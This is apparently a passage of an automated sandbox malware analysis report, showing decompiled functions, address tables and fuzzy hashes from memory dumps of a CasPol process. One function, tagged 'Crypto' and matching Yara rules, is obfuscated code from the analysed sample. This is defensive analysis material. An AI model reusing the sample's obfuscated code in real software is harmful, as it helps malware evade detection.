                                                                0x0165a668
                                                                0x0165a66d
                                                                0x0165a706
                                                                0x0165a706
                                                                0x01699bda
                                                                0x01699be6
                                                                0x01699beb
                                                                0x00000000
                                                                0x01699beb
                                                                0x0165a679
                                                                0x01699b7a
                                                                0x00000000
                                                                0x01699b7a
                                                                0x0165a683
                                                                0x0165a6f4
                                                                0x0165a6f7
                                                                0x0165a6f9
                                                                0x0165a6fd
                                                                0x0165a6a0
                                                                0x0165a6a0
                                                                0x0165a6ad
                                                                0x0165a6af
                                                                0x0165a6b4
                                                                0x01699ba7
                                                                0x01699bac
                                                                0x00000000
                                                                0x00000000
                                                                0x01699bc6
                                                                0x01699bce
                                                                0x01699bd1
                                                                0x01699bd3
                                                                0x01699bd3
                                                                0x00000000
                                                                0x01699bd1
                                                                0x0165a6bd
                                                                0x0165a6c3
                                                                0x0165a6c6
                                                                0x0165a6d2
                                                                0x0165a701
                                                                0x0165a704
                                                                0x00000000
                                                                0x0165a704
                                                                0x0165a6d4
                                                                0x0165a6d6
                                                                0x0165a6d9
                                                                0x0165a6db
                                                                0x0165a6e1
                                                                0x0165a6e6
                                                                0x0165a6e8
                                                                0x0165a6e8
                                                                0x0165a6ea
                                                                0x00000000
                                                                0x0165a6ea
                                                                0x0165a688
                                                                0x0165a692
                                                                0x0165a694
                                                                0x0165a699
                                                                0x00000000
                                                                0x00000000
                                                                0x0165a69d
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 87c64a3f56efb37293c3b431969811a9f33368f33f85c0a00836374687b01671
                                                                • Instruction ID: a58e880d58d7f6a085324fc579b6c4d8935fa6a40542da33aaad111e7ba61f2b
                                                                • Opcode Fuzzy Hash: 87c64a3f56efb37293c3b431969811a9f33368f33f85c0a00836374687b01671
                                                                • Instruction Fuzzy Hash: B7416CB5A00215DFCB19CF98C890BAABBF6BF89314F15C1ADE905AB344C779A901CF54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0164C182 Relevance: .1, Instructions: 104COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 68%
                                                                			E0164C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01647D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E016F8D34(_v8, _t80);
					}
					E01642280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0163FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E016F8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0163FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0166B180();
						if(_a4 != 0) {
							E01642280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0164BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0164BB2D(_t16, _t15);
						E0164B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0163FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0163FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0163FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                0x0164c18d
                                                                0x0164c18f
                                                                0x0164c191
                                                                0x0164c19b
                                                                0x0164c1a0
                                                                0x0164c1d4
                                                                0x0164c1de
                                                                0x01692d6e
                                                                0x0164c1e4
                                                                0x0164c1e4
                                                                0x0164c1e4
                                                                0x0164c1ec
                                                                0x01692d7d
                                                                0x01692d7d
                                                                0x0164c1f3
                                                                0x0164c1ff
                                                                0x01692d88
                                                                0x01692d8d
                                                                0x01692d94
                                                                0x01692d94
                                                                0x01692d9f
                                                                0x01692da4
                                                                0x01692dab
                                                                0x01692db0
                                                                0x01692db2
                                                                0x01692db3
                                                                0x01692db4
                                                                0x01692dbc
                                                                0x01692dc3
                                                                0x01692dc3
                                                                0x0164c205
                                                                0x0164c205
                                                                0x0164c208
                                                                0x0164c20e
                                                                0x0164c211
                                                                0x0164c216
                                                                0x0164c219
                                                                0x0164c21f
                                                                0x0164c222
                                                                0x0164c22c
                                                                0x0164c234
                                                                0x0164c23a
                                                                0x0164c23f
                                                                0x0164c245
                                                                0x0164c24b
                                                                0x0164c251
                                                                0x0164c25a
                                                                0x0164c276
                                                                0x0164c27d
                                                                0x0164c27d
                                                                0x0164c25c
                                                                0x0164c25c
                                                                0x00000000
                                                                0x0164c25e
                                                                0x0164c1a4
                                                                0x0164c1aa
                                                                0x0164c1b3
                                                                0x0164c265
                                                                0x0164c26c
                                                                0x0164c26c
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                • Instruction ID: bdf4f7f2b704c463eeb7fc25edea346d327bf76fbd0a6976b6094f3a6c387357
                                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                • Instruction Fuzzy Hash: 1F310372A06547BBD705EBB8CC90BEAFB59BF52204F04815ED41C87301DB346A0AD7A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016A7016 Relevance: .1, Instructions: 104COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 76%
                                                                			E016A7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x171d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E016A6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E016A6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01647D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01669AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0166B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01644620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                0x016a7016
                                                                0x016a701e
                                                                0x016a702b
                                                                0x016a7033
                                                                0x016a7037
                                                                0x016a703c
                                                                0x016a703e
                                                                0x016a7041
                                                                0x016a7045
                                                                0x016a704a
                                                                0x016a7050
                                                                0x016a7055
                                                                0x016a705a
                                                                0x016a7062
                                                                0x016a7062
                                                                0x016a705a
                                                                0x016a7064
                                                                0x016a7064
                                                                0x016a7067
                                                                0x016a7071
                                                                0x016a7096
                                                                0x016a709b
                                                                0x016a70a2
                                                                0x016a70a6
                                                                0x016a70a7
                                                                0x016a70ad
                                                                0x016a70b3
                                                                0x016a70b6
                                                                0x016a70bb
                                                                0x016a70c3
                                                                0x016a70c3
                                                                0x016a70c6
                                                                0x016a70cd
                                                                0x016a70dd
                                                                0x016a70e0
                                                                0x016a70e2
                                                                0x016a70e2
                                                                0x016a70ee
                                                                0x016a7101
                                                                0x016a70f0
                                                                0x016a70f9
                                                                0x016a70f9
                                                                0x016a710a
                                                                0x016a710e
                                                                0x016a7112
                                                                0x016a7117
                                                                0x016a7118
                                                                0x016a7118
                                                                0x016a70bb
                                                                0x016a711d
                                                                0x016a7123
                                                                0x016a7131
                                                                0x016a7131
                                                                0x016a7136
                                                                0x016a713d
                                                                0x016a713e
                                                                0x016a713f
                                                                0x016a714a
                                                                0x016a714a
                                                                0x016a7084
                                                                0x016a7088
                                                                0x00000000
                                                                0x016a708e
                                                                0x016a708e
                                                                0x016a7092
                                                                0x00000000
                                                                0x016a7092

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d708b0c87178e01334ee6799366e375b52f7a7e3027546d3e3559e3578a8ddb8
                                                                • Instruction ID: 9b4af6fc2025217220cae8000656d442f31ff24be348c7979f62059efa766b8e
                                                                • Opcode Fuzzy Hash: d708b0c87178e01334ee6799366e375b52f7a7e3027546d3e3559e3578a8ddb8
                                                                • Instruction Fuzzy Hash: 4C31B1726047919BC320DF68CC50A6AB7EABF98700F444A2DF99587790E731ED14CBA6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016D3D40 Relevance: .1, Instructions: 98COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 70%
                                                                			E016D3D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x171d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E01642280(_t34, 0x1718a6c);
				_t64 =  *0x1715768; // 0x77995768
				if(_t64 != 0x1715768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77995770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E0163FFB0(_t53, _t64, 0x1718a6c);
						 *0x171b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E01642280(_t45, 0x1718a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x1715768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E0163FFB0(_t51, _t64, 0x1718a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0166B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                                                                0x016d3d40
                                                                0x016d3d48
                                                                0x016d3d52
                                                                0x016d3d59
                                                                0x016d3d5d
                                                                0x016d3d61
                                                                0x016d3d63
                                                                0x016d3d67
                                                                0x016d3d69
                                                                0x016d3d72
                                                                0x016d3d76
                                                                0x016d3d7a
                                                                0x016d3d7f
                                                                0x016d3d8b
                                                                0x016d3d91
                                                                0x016d3d91
                                                                0x016d3d91
                                                                0x016d3d94
                                                                0x016d3d96
                                                                0x016d3d9d
                                                                0x016d3da1
                                                                0x016d3db0
                                                                0x016d3dba
                                                                0x016d3dbc
                                                                0x016d3dbc
                                                                0x016d3dc6
                                                                0x016d3dcb
                                                                0x016d3dcf
                                                                0x016d3dd1
                                                                0x016d3dd4
                                                                0x00000000
                                                                0x00000000
                                                                0x016d3dd9
                                                                0x016d3e0c
                                                                0x016d3e0c
                                                                0x016d3e0f
                                                                0x016d3ddb
                                                                0x016d3ddb
                                                                0x016d3de0
                                                                0x00000000
                                                                0x016d3de2
                                                                0x016d3de2
                                                                0x016d3de4
                                                                0x016d3de8
                                                                0x016d3deb
                                                                0x016d3df1
                                                                0x00000000
                                                                0x016d3df3
                                                                0x016d3df3
                                                                0x016d3df5
                                                                0x016d3df8
                                                                0x016d3dfa
                                                                0x00000000
                                                                0x016d3dfa
                                                                0x016d3df1
                                                                0x016d3de0
                                                                0x016d3e11
                                                                0x016d3e11
                                                                0x00000000
                                                                0x016d3dfe
                                                                0x016d3e04
                                                                0x016d3e06
                                                                0x00000000
                                                                0x016d3e06
                                                                0x00000000
                                                                0x016d3e04
                                                                0x016d3d91
                                                                0x016d3e15
                                                                0x016d3e1a
                                                                0x016d3e1f
                                                                0x016d3e1f
                                                                0x016d3e23
                                                                0x016d3e29
                                                                0x00000000
                                                                0x00000000
                                                                0x016d3e2e
                                                                0x00000000
                                                                0x016d3e30
                                                                0x016d3e30
                                                                0x016d3e35
                                                                0x00000000
                                                                0x016d3e37
                                                                0x016d3e3e
                                                                0x016d3e42
                                                                0x016d3e48
                                                                0x016d3e4e
                                                                0x00000000
                                                                0x016d3e4e
                                                                0x016d3e35
                                                                0x00000000
                                                                0x016d3e2e
                                                                0x016d3e5b
                                                                0x016d3e5c
                                                                0x016d3e5d
                                                                0x016d3e68
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5f4a4331b486ece7cf747a06b827ba492878abd611a387ed42be9017901eaabe
                                                                • Instruction ID: d23224886a71ead1b8a033991687ec91a707650364abb22643e3c70c20e25f13
                                                                • Opcode Fuzzy Hash: 5f4a4331b486ece7cf747a06b827ba492878abd611a387ed42be9017901eaabe
                                                                • Instruction Fuzzy Hash: 653157B2A09302CFC714DF18D98081ABBE1FB85610F04896EE4889B395D730DA04CBA7
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00421821 Relevance: .1, Instructions: 98COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 64%
                                                                			E00421821() {
				signed int _t11;
				signed int _t12;
				signed int _t13;
				intOrPtr _t15;
				signed char _t17;
				signed int _t19;
				signed int _t20;
				signed int _t21;
				signed int _t24;

				_t12 = _t11 ^ 0x0add1ee9;
				 *0xce406ce7 =  *0xce406ce7 ^ _t13;
				_t21 = _t20 ^  *0x67d44423;
				if(_t24 ==  *0xfd093b1f) {
					__eax = __eax -  *0x17c3467a;
					__edi = __edi & 0x058bef1f;
					__ecx =  *0xf8876d69 * 0xc40a;
					if(__ecx <= 0) {
						__ebp =  *0xa56d6b7f * 0xf0bb;
						_t6 = __eax;
						__eax =  *0xa3b6e16;
						 *0xa3b6e16 = _t6;
						__cl = __cl ^  *0x504aa14;
						__bl = __bl + 0xa0;
						asm("adc ecx, 0x6f1adf37");
						__esi = __esi - 0xfd580f3b;
						__edx = __edx - 0x6bc9ee99;
						 *0x77fc8195 = __edx;
						asm("rcl byte [0x5dd483a], 0x7c");
						asm("adc ebx, [0x7d001221]");
						if(__edx < 0) {
							 *0xcbb99671 =  *0xcbb99671 | __esp;
							_push(__ebp);
							if( *0xcbb99671 < 0) {
								 *0x7adfec79 =  *0x7adfec79 ^ __esi;
								asm("sbb eax, [0x24a3ebfa]");
								__esp = __esp | 0x2b34ca11;
								asm("cmpsb");
								__al = __al + 0x8a;
								asm("adc eax, [0xe58289fd]");
								__esi = __esi + 1;
								__esp = __esp & 0x5c79decb;
								asm("movsb");
								__ebp = __ebp + 1;
								 *0xc2be5c0b =  *0xc2be5c0b ^ __esi;
								__ch = __ch +  *0x8c7b7eb4;
								_pop(__edi);
								 *0xb88c21ee =  *0xb88c21ee << 0x5f;
								_t7 = __ecx;
								__ecx =  *0xdbcb8;
								 *0xdbcb8 = _t7;
								__esi = __esi +  *0x956f461f;
								__cl = __cl - 0x24;
								__esp = __esp ^  *0xed5d94cb;
								__edi =  *0x264ff7d3;
								 *0x112e1493 =  *0x112e1493 + __eax;
								__ebx = __ebx | 0xc9c9b983;
								asm("adc [0xdad977a0], dh");
								asm("sbb edx, [0x8b739d35]");
								__esp = __eax;
								__edi =  *0x472b3069 * 0xaf9a;
								__esp =  *0x5d47433f;
								 *0xb241bab2 =  *0xb241bab2 << 0x4b;
								__edi =  *0x472b3069 * 0xaf9a - 1;
								__ebx = __ebx + 0x45bb5607;
								__esp =  *0x4077cfdf;
								 *0x4077cfdf =  *0x5d47433f;
								asm("sbb cl, 0xa8");
								asm("cmpsb");
								 *0x4e88c618 =  *0x4e88c618 & __dh;
								_pop(__eax);
								asm("stosd");
							}
						}
					}
				}
				L1:
				asm("sbb [0xc36efb09], edx");
				asm("adc [0x767ba821], ebx");
				 *0x240d8bd4 =  *0x240d8bd4 >> 0;
				_t12 = _t12 & 0x0000000c;
				_t21 = (_t21 &  *0x857f151d) + 0x00000001 &  *0x742bcdf8;
				 *0x8e9a6d6 =  *0x8e9a6d6 >> 0x41;
				asm("sbb ebp, [0x8771e3b]");
				_push(_t21);
				_t19 = _t19 &  *0x912dd0fb;
				_t17 = _t17 & 0x00000020;
				asm("rol byte [0xf89935f2], 0x22");
				asm("rol dword [0xfbe9540d], 0x6c");
				 *0x9459ca0a = _t15;
				 *0xfe6304d9 =  *0xfe6304d9 << 0x56;
				asm("adc bl, [0xc320ed3c]");
				_t24 =  *0x1ac1b56a * 0x85fc;
				asm("scasb");
				_t15 =  *0x9459ca0a - 1;
				 *0xaab74829 =  *0xaab74829 ^ _t12;
				asm("rcl dword [0x7f106817], 0x35");
				asm("adc eax, [0x9d56ea15]");
				_t13 = _t13 +  *0x5ceec7ba &  *0x3b22d9f7;
				 *0x874bd2d7 =  *0x874bd2d7 << 0x52;
				goto L1;
			}












                                                                0x00421821
                                                                0x00421826
                                                                0x0042182c
                                                                0x00421838
                                                                0x0042183e
                                                                0x00421846
                                                                0x0042184e
                                                                0x00421858
                                                                0x0042185e
                                                                0x00421868
                                                                0x00421868
                                                                0x00421868
                                                                0x0042186e
                                                                0x00421874
                                                                0x00421877
                                                                0x0042187d
                                                                0x00421883
                                                                0x00421889
                                                                0x0042188f
                                                                0x00421896
                                                                0x0042189c
                                                                0x004218a2
                                                                0x004218a8
                                                                0x004218a9
                                                                0x004218af
                                                                0x004218b5
                                                                0x004218bb
                                                                0x004218c1
                                                                0x004218c2
                                                                0x004218c4
                                                                0x004218ca
                                                                0x004218cb
                                                                0x004218d1
                                                                0x004218d2
                                                                0x004218d3
                                                                0x004218d9
                                                                0x004218df
                                                                0x004218e1
                                                                0x004218e8
                                                                0x004218e8
                                                                0x004218e8
                                                                0x004218ee
                                                                0x004218f4
                                                                0x004218f7
                                                                0x004218fd
                                                                0x00421906
                                                                0x00421912
                                                                0x00421918
                                                                0x0042191e
                                                                0x00421924
                                                                0x00421925
                                                                0x0042192f
                                                                0x0042193b
                                                                0x00421942
                                                                0x0042194c
                                                                0x00421952
                                                                0x00421952
                                                                0x00421958
                                                                0x0042195b
                                                                0x0042195c
                                                                0x00421968
                                                                0x00421969
                                                                0x00421969
                                                                0x004218a9
                                                                0x0042189c
                                                                0x00421858
                                                                0x0042177d
                                                                0x0042177d
                                                                0x00421783
                                                                0x00421789
                                                                0x004217a2
                                                                0x004217a5
                                                                0x004217ab
                                                                0x004217b2
                                                                0x004217b8
                                                                0x004217b9
                                                                0x004217c5
                                                                0x004217c8
                                                                0x004217cf
                                                                0x004217d6
                                                                0x004217dc
                                                                0x004217e9
                                                                0x004217ef
                                                                0x004217f9
                                                                0x004217fa
                                                                0x004217fb
                                                                0x00421801
                                                                0x00421808
                                                                0x0042180e
                                                                0x00421814
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cac74a819437b5611dc75fad9e3164fcc12c1fdb1a154e1179507ce690b5ab9e
                                                                • Instruction ID: 66b8aff2017cfeca453581ed2337e8374f4464e0b25fe9a780bace185d95b657
                                                                • Opcode Fuzzy Hash: cac74a819437b5611dc75fad9e3164fcc12c1fdb1a154e1179507ce690b5ab9e
                                                                • Instruction Fuzzy Hash: 33418872A18310CFE706DF35D85AB523FB1F352310F45416ED5A297992E7342626CF8A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165A70E Relevance: .1, Instructions: 96COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 92%
                                                                			E0165A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1717b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1717b10 = 8;
					 *0x1717b14 = 0x1717b0c;
					 *0x1717b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0165A990(0x1717b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0165A840(__edx, __ecx, __ecx, _t52, 0x1717b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1717b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1717b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1717b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L01644620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1717b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0166F3E0(_t50,  *0x1717b14, _t8 >> 3);
						_t28 =  *0x1717b14; // 0x0
						__eflags = _t28 - 0x1717b0c;
						if(_t28 != 0x1717b0c) {
							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1717b14 = _t50;
						_t48 = _v12;
						 *0x1717b10 = _t9;
						goto L6;
					}
					 *0x1717b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                0x0165a713
                                                                0x0165a714
                                                                0x0165a717
                                                                0x0165a71d
                                                                0x0165a720
                                                                0x0165a722
                                                                0x0165a727
                                                                0x0165a74a
                                                                0x0165a754
                                                                0x0165a75e
                                                                0x0165a768
                                                                0x0165a76a
                                                                0x0165a773
                                                                0x0165a78b
                                                                0x0165a790
                                                                0x0165a792
                                                                0x0165a741
                                                                0x0165a741
                                                                0x0165a743
                                                                0x0165a749
                                                                0x0165a749
                                                                0x0165a732
                                                                0x0165a73a
                                                                0x0165a797
                                                                0x0165a79d
                                                                0x0165a7a3
                                                                0x0165a7a9
                                                                0x0165a7b6
                                                                0x0165a7bc
                                                                0x0165a7ca
                                                                0x0165a7e0
                                                                0x0165a7e2
                                                                0x0165a7e4
                                                                0x01699bf2
                                                                0x00000000
                                                                0x01699bf2
                                                                0x0165a7ed
                                                                0x0165a7f2
                                                                0x0165a800
                                                                0x0165a805
                                                                0x0165a80d
                                                                0x0165a812
                                                                0x01699c08
                                                                0x01699c08
                                                                0x0165a818
                                                                0x0165a81b
                                                                0x0165a821
                                                                0x0165a824
                                                                0x00000000
                                                                0x0165a824
                                                                0x0165a7ae
                                                                0x00000000
                                                                0x0165a7ae
                                                                0x0165a73c
                                                                0x0165a73e
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1cd7eeb0dde920686ad315764c68dd62c22b5cfd014845b7a1ea81e8903169c2
                                                                • Instruction ID: 3a49618a4f39fbe1b78d73cb3e4317960fec7163a899740412c159b1ce30f5cf
                                                                • Opcode Fuzzy Hash: 1cd7eeb0dde920686ad315764c68dd62c22b5cfd014845b7a1ea81e8903169c2
                                                                • Instruction Fuzzy Hash: 8531ADB57002059FD739CB5CEC80F6ABBFAFB84720F148A5AE60587348D774A901CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016561A0 Relevance: .1, Instructions: 93COMMON
